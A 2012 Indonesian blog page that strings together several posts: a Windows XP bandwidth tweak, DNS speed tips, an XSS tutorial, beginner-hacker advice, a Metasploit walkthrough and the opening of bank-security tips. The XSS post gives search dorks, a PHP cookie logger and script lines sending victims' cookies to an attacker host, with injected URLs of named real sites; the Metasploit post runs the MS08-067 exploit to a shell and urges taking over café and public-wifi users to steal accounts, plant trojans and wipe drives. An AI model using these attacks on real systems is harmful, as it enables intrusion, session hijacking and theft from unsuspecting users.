Tuesday, May 1, 2012

curi atau membagi bandwith PC di warnet (^_^)

curi atau membagi bandwith PC di warnet (^_^)

Sebenarnya cara ini adalah cara yang digunakan untuk mempercepat kecepatan ineternet kita pada windows XP.

Inti nya adalah windows XP tersetting secara default akan mengambil 20% dari kecepatan akses internet kita yang 100%.

Sebenar nya, ada beberapa software juga yang dapat kita gunakan untuk
membatasi pemakaian bandwidth pada tiap komputer client, tapi cara ini
belum dapat menjamin 100% bandwidth komputer client di warnet terbagi
secara adil.

Nah, cara yang akan saya gunakan adalah dengan cara mensetting %
penggunaan bandwidth client yang di setting melalui windows itu sendiri.

Cara nya adalah sebagai berikut:

1. Klik start ==> run

2. Lalu ketik gpedit.msc, Kemudian setelah itu keluar kotak “Group Policy”

3. Di “ Computer Configuration “, Pilih “Administrative Templates“

4. Lalu pilih “ Network “

5. Klik pada “QoS Packet Scheduler “

6. Setelah itu Pilih Pada “ Limit reservable Bandwidth “

7. Pilih dari “ Not Configured “ menjadi “ Enable “

8. Setelah itu Pada tabel bawah pada tulisan “ Bandwidth Limit % “ Ubah
Dari “20” Menjadi “80 atau 20”, Lalu “Apply” , “ OK “. setting ini
tergantung dari jumlah komputer, jika kita mau setting setiap komputer
dapet bandwith 10% maka kita tinggal masukan angka 90%, bila setiap
komputer ingin kita set dapat 20% maka tinggal kita masukan angka 80%.
Mungkin cukup sekian tutorial dari saya,,
jika ada sobat yang mau melanjutkan tutor ini dipersilahkan dengan hormat.

selamat mencoba . . .



SEMOGA BERMANFAAT.......(^_^)

 

Menemukan DNS Server untuk Menambah Kecepatan Koneksi Internet

Menemukan DNS Server untuk Menambah Kecepatan Koneksi Internet

Jan 19, 2011 by masbin Under Tips & Trik - 71 Comments
Seperti posting tentang DNS sebelumnya, kali ini saya akan membahas lebih banyak  tentang custom DNS (Domain Name Server). Bagi yang belum tahu, penjelasan singkatnya DNS atau DNS server adalah server yang bertugas menerjemahkan nama domain ke alamat IP (IP address) sebelum ditelusuri lebih lanjut.

Jadi, cara singkat kerjanya, komputer kita berkomunikasi dengan internet menggunakan alamat IP, jadi ketika kita mengetikkan facebook.com misalnya, komputer kita akan menanyakan ke DNS , apa alamat IP dari facebook.com, kemudian setelah dibalas oleh DNS server dengan alamat IP yang bersangkutan, komputer akan mencari alamat tersebut melalui ISP (Internet Service Provide) kita seperti speedy, fastnet dan sebagainya.
Nah, setiap kita tersambung ke Internet, entah itu di kantor, rumah atau hotspot di kampus atau mall, pasti alamat DNS ini sudah ada secara otomatis (default). Yang akan kita lakukan disini adalah menemukan dan mengubah alamat DNS (yang juga berupa IP) atau biasa disebut custom DNS. Tujuan menggunakan custom DNS ini bermacam-macam diantaranya untuk memperbaiki kecepatan ber-Internet-ria.
Kecepatan kita saat koneksi ke Internet juga tergantung seberapa cepat DNS server dapat melayani permintaan kita untuk menerjemahkan nama domain (contohnya facebook.com) ke alamat IP yang bersangkutan. Biasanya ini sangat cepat, tapi karena DNS adalah server, kinerjanya juga tergantung kapasitas server tersebut (CPU, memory) dan juga jumlah layanan yang bisa dilayani sekaligus. Misalnya ketika permintaan melebihi kapasitas server DNS, maka yang akan terjadi adalah lambat atau malah keluar notifikasi error di browser kita.
Jika anda menginginkan tambahan kecepatan koneksi Internet, Google Public DNS adalah salah satu pilihannya.  Alamat IP Google Public DNS adalah :8.8.8.8 / 8.8.4.4  (DNS Primary / Secondary).
Jika anda ingin lebih yakin lagi dan ingin lebih banyak alternatif  DNS yang dapat meningkatkan kecepatan internet anda, anda bisa menggunakan NameBench. Aplikasi ini akan menguji koneksi Internet Anda dengan menggunakan beberapa DNS server kemudian akan merekomendasikan DNS alternatif sesuai kecepatan dan kedekatannya.  Cara menggunakannya:
  • setelah didownload (silahkan pilih download sesuai Sistem Operasi anda di halaman kanan atas website Namebench), jalankan aplikasi seperti gambar dibawah :
  • Langsung klik “Start Benchmark” .
  • Setelah melakukan pengujian atau benchmarking selama sekitar 6-10 menit, maka hasilnya akan ditampilkan di browser. Berikut adalah contoh hasil pengujian Namebench pada koneksi speedy yang saya pakai :
Ya, pada hasil tersebut Google Public DNS mendapatkan hasil rekomendasi terbaik dengan kemungkinan menambah kecepatan sebesar 28%. Namun hasil tersebut akan berbeda beda sesuai layanan Internet yang anda pakai. Selain itu Namebench juga memberikan alternatif Secondary (pada contoh diatas CepatNet-2 ID / 202.43.178.245) dan Tertiary Server (pada contoh diatas Telekomspeedy Jakarta-4 ID /202.134.0.61 ). Jadi ternyata DNS Telkomspeedy sendiri berada di urutan ketiga berdasarkan kecepatan dan kedekatan dengan koneksi Internet kita.
Setelah menemukan alamat DNS server yang cocok , anda tinggal mengubah setting DNS di komputer.
Sebagai tambahan, selain alasan kecepatan, ada 2 alasan utama lain pengguna menggunakan custom DNS.
Yang pertama adalah alasan keamanan. Untuk hal ini pengguna mengiginkan DNS yang juga mempunyai kemampuan mendeteksi alamat-alamat website yang punya potensi berbahaya seperti phising, malware . Custom DNS yang jadi favorit pengguna diantaranya adalah  Sunbelt ClearCloud dengan alamat : 74.118.212.1 / 74.118.212.2 (Primary / Secondary)
Kemudian yang kedua adalah alasan filterisasi konten. Jika anda menginginkan kenyamanan Internet dengan isi konten yang family friendly, maksudnya aman diakses seluruh anggota keluarga terutama anak kecil, seperti tidak ada konten pornografi dsb, maka salah satu pilihannya adalah menggunakan Open DNS dengan alamat  208.67.222.222 / 208.67.220.220 (Primary / Secondary)

 

XSS Attack - from Zero To Hero (^_^)

XSS Attack - from Zero To Hero (^_^)

Oke kita mulai aja tanpa harus ada basa basi (^_^)

Apa itu XSS?
XSS adalah suatu cara memasukan code/script HTML kedalam suatu web site dan dijalankan melalui browser di client. Xss mungkin jenis serangan yang paling cupu bagi seorang attacker yang tidak mempunyai Bug atau exploit. dikarenakan Xss hanya membutuhkan sebuah browser saja.Tapi siapa sangka XSS bisa menciptakan serangan yg bsa menghancurkan website juga bsa membahyakan pengunjung. Xss di kembangkan lagi menjadi XSS Shell atau lebih terkenal dengan XSS Tunnel – Proxy. Nah ini penjelasannya.

APAKAH XSS SHELL?
XSS Shell adalah XSS backdoor dan zombie manager. Konsep ini pertama kali dikenalkan oleh XSS-Proxy (http://xss-proxy.sourceforge.net/). Biasanya dalam serangan XSS, penyerang memiliki satu target, dimana dengan XSS Shell anda dapat mengirim permintaan interaktif dan mendapatkan respon dari korban. Anda dapat menyisipkan backdoor pada halaman tersebut.
Anda bisa mencuri autektikasi pada website, Anda dapat memotong pembatasan IP di administrasi panel, Anda dapat DDoS beberapa sistem . Pada dasarnya alat ini menunjukkan bahwa Anda dapat berbuat lebih banyak dengan XSS (^_^) . . .
INI kita bahas nanti di pembahasan selanjutnya . . . (^_^)

Bagaimanakah menemukan Situs yang vulner?
mencari situs yang vulner emang gampang-gampang susah, karena kebanyakan situs udah memfilternya, tapi gimanapun kita masih bisa menggunakan bantuan sesepuh kita yang paling baik di seluruh dunia untuk mencarinya, sapa lagi kalo bukan paman Google.hehehehe
kita menggunakan Dork dengan query sebagai berikut :
inurl:"search.php?q="
inurl:/gen_confirm.php?errmsg=

atau jika manual kita bisa mencoba fasilitas sebuah site seperti Guest book, Search Box, Shoutboxes, Comment atau Forum.

 Nah sekarang jika sudah kita ketemukan target kita akan mencoba mengexploit site itu dulu, apakah site itu mempunyai vulner terhadap XSS.
Ok sekarang kita coba menginjeksi dengan kode :
" alert("XSS") "

maka jika menampilkan dialog box seperti alert XSS maka site itu vulner  . . .

Tapi apakah sekedar itu saja?
 sekarang kita coba dengan metoda lain . . .
apakah site itu bisa dideface bro?
bisa saja, tergantung logika yang ada di kepala anda heheheh . . . . sekarang mari kita coba bagaimana mengattack site yang vulner itu.

ok.
dengan penyisipan tag IMG SCR pada sebuah url atau pada comment sekali.
Apa itu IMG SCR tu bro? IMG SCR itu adalah semacam Tag pemangilan gambar dari suatu link tertentu untuk ditampilkan kepada website tersebut.

Adakah cara lain?
Metode penyisipan lain selain dengan gambar juga bisa kita lakukan misalnya dengan file flash (SWF) hingga serangan ini mempunyai style tersendiri . . .Metode lain dengan Iframe Attack . . . di pembahasan berikutnya akan kita jelaskan (^_^)

dengan penyisipan tag tersebut maka akan langsung meng exekusi file SWF pada link tersebut.
atau mungkin dengan melakukan redirect ke situs lain misalnya dengan code :
" window.open( "http://www.facebook.com/" ) "

maka jika dieksekusi , kita akan di redirect ke situs facebook, mungkin biasa aja, tapi gimana klo dibawa ke suatu situs login palsu misalnya fake login yahoo, mungkin bisa berbahaya juga tuh.

Nah oleh karena itu XSS ini walaupun bug kecil tapi bisa berbahaya juga, misalnya dengan melakukan teknik Xss Cookies Stealing.
Apa itu Cookies Stealing . cookie stealing itu adalah mendapatkan cookie orang lain, supaya kamu dikenali oleh Situs target sebagai orang tersebut.

Nah buat pertama salin aja code dibawah ini :
$c = $_GET['c'];
$file = fopen(?Log.txt?,'a?);
fwrite($file,$c);
fclose($file);
?>

Ok sekarang kita anggap lo dah memilikinya save dengan extensien Php dan upload ke server hosting, dan jangan lupa untuk membuat file LOG.TXT dengan chmod 777 dan sekarang kita langsung menuju ke website yang akan diserang.
masukan code ini
 " window.location = "http://hosting-lu.com/cookielogger.php?c="+document.cookie "
atau
" document.location = "http://hosting-lu.com/cookielogger.php?c="+document.cookie "
hingga otomatis url pada site berubah menjadi . . .
http://Target.com/search.php?q=document.location
atau
"http://server-lu.com/cookielogger.php?c="+document.cookie "

Nah jika ada user berkunjung ke situs yang telah di inject tadi maka otomatis cookies tersebut akan terekam dan masuk kedalam log file yang telah dipersiapkan dan lo bisa mengawasi cookies yang didapatkan hingga ntar lo bisa meng hijack cookies tersebut.
Ne misalkan hasil cookies yang telah didapat :
" $ ls -la /home/theSiteUsername/tmp/ | grep sess
-rw------- 1 theSiteUsername theSiteUsername 5068 Jan 18 09:20 sess_1a1aexxxxxxx5e282e1a5747694ec8e2
-rw------- 1 theSiteUsername theSiteUsername 5023 Jan 18 09:19 sess_462fexxxxxxx13dafa331bc15e962e22
-rw------- 1 theSiteUsername theSiteUsername 5109 Jan 18 10:51 sess_717edxxxxxxx653df341f91d096e0484
-rw------- 1 theSiteUsername theSiteUsername 5079 Jan 18 09:14 sess_91850xxxxxxxef480524c23412b23dc1
-rw------- 1 theSiteUsername theSiteUsername 5011 Jan 18 10:38 sess_9246dxxxxxxxe6e710a9e623af23ca95

--------------------------------------------------------------------------------------------------------------

exemple from newbie :
dork : inurl:/gen_confirm.php?errmsg=

target : http://www.micomprador.com/SourcingCenter/gen_confirm.php?errmsg=%3Cscript%3Ealert%28%27hacked%20by%20dammah%27%29%3C/script%3E%3Cimg%20src=%22http://photos-d.ak.fbcdn.net/hphotos-ak-snc7/389945_2057430655870_1847730663_1289959_1115091666_a.jpg%3E%3C/img%3E

atau :
http://www.all-from.eu/gen_confirm.php?errmsg=%3Cscript%3Ealert%28%27hacked%20by%20dammah%27%29%3C/script%3E%3Cimg%20src=%22http://photos-d.ak.fbcdn.net/hphotos-ak-snc7/389945_2057430655870_1847730663_1289959_1115091666_a.jpg%3E%3C/img%3E

atau :
http://www.veethitrade.com/gen_confirm.php?errmsg=%3Cscript%3Ealert%28%27hacked%20by%20dammah%27%29%3C/script%3E%3Cimg%20src=%22http://photos-d.ak.fbcdn.net/hphotos-ak-snc7/389945_2057430655870_1847730663_1289959_1115091666_a.jpg%3E%3C/img%3E

Note : anda hanya cukup mengganti coding setelah code berikut ini ?errmsg=<coding anda>cukup sekian tutor pendeknya . . . kita akan lanjutkan tutorial berikutnya dengan pembahasan yang lebih eXtrime . . . jika ada sobat yang mau melanjutkan tutor ini dipersilahkan dengan hormat.selamat berkarya . . . sampai jumpa di tutorial berikutnya (^_^)

 

5 Langkah untuk Hacker pemula yang harus diketahui

5 Langkah untuk Hacker pemula yang harus diketahui

5 Hal Yang Haus Anda  
Ketahui Bila Ingin Jadi Hacker mungkin banyak di grup-grup dan di
forum-forum
yang ingin menjadi hacker dan pencarian hacker terkait barang di
internet. Pada awalnya kalin memerlukan panduan yang tepat, tetapi
kebanyakan diantara kalian hanya memiliki Google sebagai guru. Tapi ada
beberapa kesalahan umum yang sebagian besar hacker baru lakukan.

Berikut Adalah Beberapa Poin Untuk Pemula Yang Kalian Harus Tahu.


1. Pada tahap ini, sebagian besar pencarian orang untuk hacking tools dan perangkat lunak. Tapi
Di sini saya ingin membuat ini jelas bahwa tidak ada alat dan
perangkat lunak yang ada dapat hack Gmail, Facebook, Yahoo, twitter
atau
situs web aother atau account email dalam beberapa klik saja. Jenis
posting di internet hanya untuk menarik kunjungan dan penyebaran spam.
Kebanyakan dari jenis hacking tools yang diikat dengan trojan yang
menyebabkan sistem Anda beresiko. Contoh
terakhir ini Anonymous alat Loic yang digunakan untuk hack anggota
untuk menggunakan sistem mereka dalam kegiatan kriminal.

2.
Jangan gunakan keylogger premium yang tersedia gratis di website
filehosting. Hacker selalu menjadi tuan rumah jenis alat dengan Trojan.
Setelah menginstal jenis keyloggers Anda akan hacked.


3.
Jangan pernah membayar untuk hacking pada situs-situs yang meminta uang
sebagai imbalan dari hacking. Jika Anda ingin membayar untuk setiap
buku hacking, alat atau perangkat lainnya, hanya membayar pada
situs-situs terpercaya.


4. Bergabung dengan forum hacker
yang baik dan belajar hal baru dari para ahli. Jangan pernah mengikuti
seseorang hanya untuk klaimnya. Selalu ikuti orang yang memiliki
pengetahuan nyata. Menambahkan kata hacker tidak akan membuat hacker
siapa pun. Ada
banyak Javascript pranks dan situs online yang tersedia yang digunakan

untuk membuat screenshot palsu dan halaman mengotori. Ini digunakan
oleh noobs banyak untuk membuat beberapa screenshot hacker palsu untuk
berbagi di Facebook. Dan pemula mengikuti mereka berpikir sebagai
hacker.


5.Pelajari Bahasa pemrograman dan jaringan. Ini harus menjadi hacker. Sebagian
besar serangan hacking seperti SQL injection, PHP injection, XSS,
Phising dan kebutuhan lainnya banyak pengetahuan tentang pemrograman.


Hacker adalah bukan orang yang menggunakan keyloggers untuk id email hacking dan rendah deface website bersalah aman. Hacker
adalah orang yang memiliki pengetahuan mendalam dari komputer yang
dapat membuat kesuksesannya sendiri untuk hack dalam sistem aman dan
server.
hacker adalah orang yang siap untuk mengambil tantangan. Anda mungkin
mendengar nama kelompok hacking banyak yang men-deface website yang
tidak bersalah hanya untuk ketenaran. Saya pikir mereka tidak lain hanya
noob. Hacking website sekolah atau website toko tidak akan membuat Anda
hacker.

 

Masuk Dan Menguasai Sistem Operasi Komputer Orang Lain

Masuk Dan Menguasai Sistem Operasi Komputer Orang Lain


 kali ini saya mau  ngejelasin tentang bagaimana cara kita menyusup ke
komputer yang terinstall windows XP service pack 1 sampai dengan 3..
tetapi pasti anda  menanyakan 2
pertanyaan kepada anneh tentang:


1.> Keuntungan Apa yang di
dapatkan dari menyusup ke komputer orang lain :
*.> Pengetahuan yang baru yang bisa jadi berguna untuk anda
*.>
sebagai sarana perkerjaan baru...ya iaaalahh..gimana Coba klo kita
berhasil menguasai jaringan di dalam suatu fasilitas umum ( wiffii
gratisan, warkop ataupun Warnet )..wahhh bisaagan bayangkan kan...
kita
bisa mengambil chips orang dengan mudah dan menjualnya dengan senang
hati..... karna AKUN ANDA ADA PADA KAMI ...hehehhehe ( tapi saya tidak
begitu loh..hanya sekedar share )... eh satu hal lagi, anda bisa
memformat hardisk Laptop pengguna wiffi dengan Mudah..huahuahua,,,,
hahahahahaha

2.>
bagaimana caranya, ..hehehe AJAR DULUEE ...hehhe pasti begitu tooo...
huahuahuahuahuahuahuahuahua....
so
lanjut ke TKP
============================================
yang kita mesti sediakan adalah
beberapa alat bantu , yang bisa anda dapatkan secara GRATIS...
-
OS BACKTRACK ( terserah Backtrack 3 Or 4 ) hehehehe
(http://indobacktrack.or.id/2009/02/mirror-link-lokal-download-backtrack-4-iso/)
- John the Ripper
(http://www.openwall.com/john/)
-
pwdump6 ( http://www.foofus.net/fizzgig/pwdump/ )
- Trojan Buatan Sendiri atau
keylogeer atau apalahhhh
- kopi panas
- pisang goreng atau roti bakar (
yang rasa keju lebih enak )
-
ROKOK SAMPOERNA ^_^!!! huahuahua

Sudah lengkap..?!
sekarang Kita mulai exploited memakai
metasploit yang sudah include di backtrack
Untuk

lebih memahami tentang Xploited , silahkan kunjungi
http://www.metasploit.com/, karna saya tidak akan membahas bahasan
Perintah yang akan kita gunakan ( ededeh panjang sekali kiii )

Pertama
kita masuk dulu ces ke konsole( itueee klo di windows namanya CMD ) ,
nah klo sudah terbuka, ketik :
uing~BT#msfconsole

Untuk
Melihat Lihat list exploits-nya , gunakan perintah :
msf > show exploits
windows/smb/ms05_039_pnp Microsoft
Plug and Play Service Overflow
windows/smb/ms06_025_rasmans_reg
Microsoft RRAS Service RASMAN Registry Overflow
windows/smb/ms06_025_rras Microsoft RRAS Service Overflow
windows/smb/ms06_040_netapi Microsoft
Server Service NetpwPathCanonicalize Overflow
windows/smb/ms06_066_nwapi Microsoft Services MS06-066 nwapi32.dll
windows/smb/ms06_066_nwwks Microsoft
Services MS06-066 nwwks.dll
windows/smb/ms08_067_netapi
Microsoft Server Service Relative Path Stack Corruption

Wokehlah

kalo begitu....sekarang kita Mulai menScan Komputer Target
Kita...heehhehehheheh tapi untuk lebih menyakinkan saya melihat IP
Kita,.huahuahua ternyata ip kita ni bagus Juga Yah : 192.168.1.20 :

msf
> sudo nmap -v -sS -A -O 192.168.1.28
[*]
exec: sudo nmap -v -sS -A -O 192.168.1.28
[sudo]
password for test:Starting Nmap 4.62 ( http://nmap.org ) at 2010-01-08
23:50 CIT
Initiating ARP Ping Scan at
23:50
Scanning 192.168.1.28 [1 port]
Host 192.168.1.28 appears to be up
... good.
Interesting ports on
192.168.1.28:
Not shown: 1712 closed
ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows
RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft
Windows XP microsoft-ds <------
MAC
Address: 00:1E:8C:67:59:F9 (Asustek Computer)
Device type: general purpose
Running:
Microsoft Windows XP
OS details:
Microsoft Windows 2000 SP4, or Windows XP SP2 or SP3
Network Distance: 1 hop
TCP Sequence Prediction:
Difficulty=258 (Good luck!)
IP
ID Sequence Generation: Incremental
Service
Info: OS: Windows

Dari
hasil scan kita ketahui bahwa kemungkinan OS-nya menggunakan OS Windows
XP dengan port 445-nya terbuka ( lihat Yang ada Tanda Panah <---- ).
Mari kita coba masuk ke komputer ini dengan menggunakan :
exploit windows/smb/ms08_067_netapi.

msf
> use windows/smb/ms08_067_netapi
msf
exploit(ms08_067_netapi) >

Lihat opsi dari exploit ini dengan
mengetikkan
show options :
msf exploit(ms08_067_netapi) >
show options
Module options:
Name Current Setting Required
Description
---- --------------- --------
-----------
RHOST yes The target address
RPORT 445 yes Set the SMB service
port
SMBPIPE BROWSER yes The pipe name to
use (BROWSER, SRVSVC)
Exploit target:
Id Name
--
----
0 Automatic Targeting

Dari
opsi diatas, maka kita perlu set terlebih dahulu RHOST ( komputer
target) dengan mengetikkan :

msf exploit(ms08_067_netapi) > set
rhost 192.168.1.28
rhost => 192.168.1.28

Untuk

RPORT, kita tidak perlu melakukan setting apa-apa karena vulnerability
ini memang mengeksploitasi vulnerability di port 445. Untuk exploit
target diisi dengan OS komputer target. Dalam langkah ini kita
menggunakan angka 0 yang berarti automatic target. Untuk melihat OS
target apa saja, ketik :
msf
exploit(ms08_067_netapi) > show targets
Exploit
targets:
Id Name
-- ----
0 Automatic Targeting
1 Windows 2000 Universal
2 Windows XP SP0/SP1 Universal
3 Windows XP SP2 English (NX)
4 Windows XP SP3 English (NX)
-------- cut -----------

Sekarang

kita tentukan jenis payload yang ingin dipakai. Dalam langkah ini saya
ingin menggunakan tcp_bind shell (akses command prompt di kompi target) :
msf exploit(ms08_067_netapi) > set
payload windows/shell_bind_tcp
payloads
=> windows/shell_bind_tcp

Untuk melihat payload apa saja dalam
metasploit, gunakan perintah :
msf
exploit(ms08_067_netapi) > show payloads
Compatible payloads
===================
Name Description
---- -----------
generic/debug_trap Generic x86 Debug
Trap
generic/debug_trap/bind_ipv6_tcp
Generic x86 Debug Trap, Bind TCP Stager (IPv6)
generic/debug_trap/bind_nonx_tcp Generic x86 Debug Trap, Bind TCP
Stager (No NX Support)
generic/debug_trap/bind_tcp
Generic x86 Debug Trap, Bind TCP Stager
-----------
dipotong sampai disini ---------------

Nahh.. setting sudah selesai
dilakukan. Untuk melihat hasil konfigurasinya bisa dicek kembali dengan
menggunakan show options :
msf
exploit(ms08_067_netapi) > show options
Module
options:
Name Current Setting Required
Description
---- --------------- --------
-----------
RHOST 192.168.1.28 yes The
target address
RPORT 445 yes Set the
SMB service port
SMBPIPE BROWSER yes The
pipe name to use (BROWSER, SRVSVC)
Payload
options (windows/shell_bind_tcp):
Name
Current Setting Required Description
----
--------------- -------- -----------
EXITFUNC
thread yes Exit technique: seh, thread, process
LPORT 4444 yes The local port
RHOST
192.168.1.28 no The target address
Exploit
target:
Id Name
-- ----
0 Automatic Targeting

sekarang
jalankan exploit :
msf
exploit(ms08_067_netapi) > exploit
[*]
Started bind handler
[*] Automatically
detecting the target...
[*] Fingerprint:
Windows XP Service Pack 2 - lang:English
[*]
Selected Target: Windows XP SP2 English (NX)
[*] Triggering the vulnerability...
[*]
Command shell session 1 opened (192.168.1.6:33270 ->
192.168.1.28:4444)
Microsoft Windows XP
[Version 5.1.2600]
© Copyright 1985-2001
Microsoft Corp.
Jreeeengg
jeeenggg..... selamat nah...anda sudah menguasai satu
komputer....nahhhhhhh sekarang terserah anda....kan masih ada 3 alat
lagi yang blom kita gunakan..
nah

untuk itu..anda harus mencari sendiri cara untuk menginstal trojan di
komputernya dan mendapatkan sesuatu yang anda inginkan.....(seperti
password FB ao dll) cape meka mengetik bela..
kan anneh udah kasi sampai penguasaan komputer....sekarang
terserah  andalah.. :D Selamat Belajar & Selamat Mencoba,...

 

7 KIAT MENGHINDARI PEMBOBOLAN REKENING

7 KIAT MENGHINDARI PEMBOBOLAN REKENING

 

   Tips ini hanya berdasarkan teori, mungkin di lapangan bisa berbeda seiring dengan perkembangan IT. tapi mudah mudahan dapat menghindari kejadian yg tidak diinginkan.
Maraknya kejadian pembobolan rekening melalui eksploitasi kelemahan sistem layanan ATM dan juga SMS serta Internet banking meninjukkan semakin canggihnya para penjahat cyber. Pihak perbankan harus memiliki sistem pengamanan yang kuat dan terus ditingkatkan kemampuannya dari waktu ke waktu untuk antisipasi berbagai jenis upaya kejahatan yang terus berubah dan berkembang.
Meskipun demikian, agar terhindar dari tindak kriminal, diperlukan juga peran aktif nasabah. Karena di dalam dunia keamanan dikenal istilah “your security is my security”. Semua pihak harus melakukan peningkatan pengetahuan dan pemahaman bahwa di dalam pemanfaatan berbagai macam layanan yang berbasis teknologi, selain memudahkan juga terdapat resiko yang harus diwaspadai. Berikut ini adalah 7 kiat untuk menghindari aksi pembobolan rekening ini:
1. Tak Kenal Maka Tak Sayang
  Kenali layanan yang digunakan dan cermati bagaimana cara kerja teknologinya serta pahami aturan serta prosedur yang diterapkan terutama di dalam aspek pengamanan. Bank memiliki banyak produk dan layanan, sudah sepatutnya nasabah memahami dan dapat membedakan karakteristiknya. Contoh layanan SMS/mobile banking dan Internet banking pada prinsipnya adalah perluasan dari layanan ATM namun dengan fitur yang lebih terbatas dibandingkan ATM. Artinya, tidak semua fitur yang tersedia diATM (misalnya ganti PIN) bisa digunakan pula di SMS/mobile banking atau Internet banking.
Nasabah juga perlu mengetahui, bahwa untuk dapat menggunakan SMS/mobile banking dan Internet banking, terlebih dahulu harus memiliki kartu ATM dan PIN yang nanti akan digunakan untuk aktivasi/mendaftar. Bila nasabah telah paham kondisi ini, maka ybs. dapat memilih untuk menggunakan atau tidak menggunakan layanan tersebut sesuai kebutuhannya. Sebab tidak semua orang memanfaatkan online banking bahkan kartu ATM pun belum tentu digunakan. Sementara sebagian bank, terutamayang sudah online seolah menerapkan keharusan setiap nasabah untuk memiliki kartu ATM.
Setelah memahami karakteristik layanan, maka selanjutnya nasabah juga perlu mengetahui cara kerja teknologi yang bekerja di balik layanan tersebut. Edukasi semacam ini seharusnya menjadi tanggung jawab bank dan atau pihak penyedia teknologi seperti misalnya operator selular dan provider Internet. Yang paling penting di dalam edukasi ini adalah untuk menanamkan pemahaman dan disiplin kepada nasabah prosedur pemanfaatan layanan dan teknologi yang benar, mengenali kelemahannya dan juga sekaligus tata cara  pengamanannya. Dengan memahami resiko, nasabah akan lebih waspada.
Yang paling penting bagi nasabah adalah, tidak ada keharusan untuk memanfaatkan semua layanan, fitur dan teknologi yang itawarkan. Sesuaikan dengan kebutuhan anda, manakah yang paling mudah (dikuasai) dan paling nyaman untuk digunakan di dalam menunjang aktivitas transaksi.
*) catatan: anda punya pilihan untuk memilih bank dan jenis produk layanannya yang paling sesuai dengan kebutuhan. Semua bank masih tetap memiliki layanan teller konvensional dan punya cabang hingga ke pelosok, terutama beberapa bank nasional maupun bank daerah milik pemerintah.
2. Mengetahui Jenis Kartu Transaksi
Khusus untuk layanan yang menggunakan kartu sebagai media, ATM, debit, voucher elektronik, kartu kredit, dlsb. perlu diketahui jenis kartu yang dipakai. Pada prinsipnya saat ini ada 2 jenis kartu yaitu:
Magnetic stripe card, mengikuti standar ISO/IEC untuk ukuran, bentuk, karakteristik bahan magnetik yang digunakan,penempatan jalur pita magnetik, hingga format penyimpanan data. Prinsipnya kartu jenis ini menyimpan data di dalam pita magnetik yang kemudian dapat dibaca ulang menggunakan alat yang memiliki head pembaca seperti di dalam perangkat tape recorder, dengan cara digesekkan. Masyarakat awam menyebut jenis kartu ini dengan istilah “kartu gesek” atau “swipe card”.
Cara kerja teknologi magnetic stripe card pada dasarnya adalah seperti ini: pada saat digesek itulah isi data pita magnetik dibaca, dikirim, diterjemahkan dan diolah pemroses di sisi pusat untuk memeriksa identitas pemegang kartu, validitas dari kartu itu sendiri dan juga keabsahan transaksinya. Proses ini terjadi secara real time dan harus online apabila unit pembaca dan pemrosesnya terpisah.
Kartu magnetik digunakan luas oleh masyarakat untuk berbagai macam keperluan, mulai dari kartu identitas karyawan/mahasiswa/pelajar, SIM hingga kartu akses kamar hotel dlsb. bukan hanya untuk kartu ATM/debit atau kartu kredit. Sehingga perangkat pembaca (reader/skimmer), maupun untuk menulis (recorder) serta aneka software untuk enkripsi/dekripsi data dijual bebas di pasaran. Bukan hal yang luar biasa apabila terjadi penggandaan kartu ATM karena perangkatnya tersedia dan tidakmemerlukan keterampilan yang khusus untuk melakukannya. Apalagi teknologi ini sudah digunakan selama sekitar 20 tahun sehingga berbagai macam kelemahan telah diketahui luas dan karenanya sudah sepatutnya mulai digantikan dengan teknologi lainnya yang lebih maju dan aman.
Kartu dengan teknologi baru adalah jenis chip/smart card. Bentuknya seperti yang digunakan pada telepon selular (GSM/CDMA SIM/RUIM card). Ukuran dan formatnya diatur oleh standar internasional (ISO). Chip tersebut bisa berfungsi sebagai memori saja maupun juga sebagai mikroprocessor atau sekaligus keduanya. Pada dasarnya adalah sistem komputer dalam satu chip yang ditanamkan pada kartu plastik. Cara kerjanya dapat melalui kontak langsung dengan cara ditancapkan maupun secara nirkabel, cukup ditempelkan dari jarak dekat pada mesin pembaca atau kombinasi keduanya (hybrid) dan dapat digabungkan dengan teknologi lainnya seperti RFID maupun biometric system.
Biasanya chip card ini juga masih dipasang magnetic stripe untuk kebutuhan backward compatibility (kompatibilitas mundur), terutama untuk aplikasi di sektor perbankan. Karena belum semua jaringan layanan perbankan seperti mesin ATM, EDC telah memiliki kemampuan pembacaan dan pengolahan smart card. Sehingga magnetic stripe tetap dipasang di kartu yang sama sebagai backup.
Kelebihan smart card terutama adalah kemampuan pengolahan transaksi secara offline. Artinya tidak harus terkoneksi real time ke server atau pengolah pusat. Ini dimungkinkan karena seluruh data pada dasarnya telah ditanamkan di dalam chip, bukan hanya identitas tetapi juga termasuk besarnya saldo atau dana yang tersedia. Bahkan dimungkinkan melakukan transaksi langsung dari user ke user tanpa melalui bank. Sehingga kartu jenis ini dapat digunakan untuk beberapa fungsi sekaligus misalnya saja sebagai kartu ATM/debit dan juga sebagai kartu kredit dan voucher sekaligus, jadi praktis.
Smart card juga relatif lebih aman dibanding pendahulunya. Karena memiliki kemampuan processing sendiri selain sebagai memori, maka relatif lebih sulit digandakan dibandingkan jenis kartu magnetic stripe yang bersifat hanya sebagai memori saja. Perlu peralatan khusus untuk mencetak smart card yang harganya jauh lebih mahal dan oleh vendor hanya disediakan dalam jumlah terbatas.
Maka demi keamanan, gunakan hanya kartu chip. Kalau bank belum memberikan kartu chip, Anda harus minta ganti dan jangan menggunakan untuk transaksi sebelum diganti. Aturan Bank Indonesia (BI), sejak Januari 2010 untuk kartu kredit yang boleh digunakan hanya kartu jenis chip.
*) catatan: eksploitasi celah kelemahan smart card juga sudah banyak terjadi dan ada banyak kasus dilaporkan. Misalnya penggandaan chip dan pemindai jarak jauh untuk smart card berbasis teknologi RFID (kartu voucher yang ditempelkan pada mesin EDC). Sehingga beberapa layanan mulai membuat kombinasi sistem keamanan ganda tidak hanya berbasis PIN dan password melainkan juga biometrik (sidik jari, retina dlsb.). Tapi masalahnya adalah biaya dan kerumitan implementasinya.
3. Perlindungan Kartu Secara Fisik
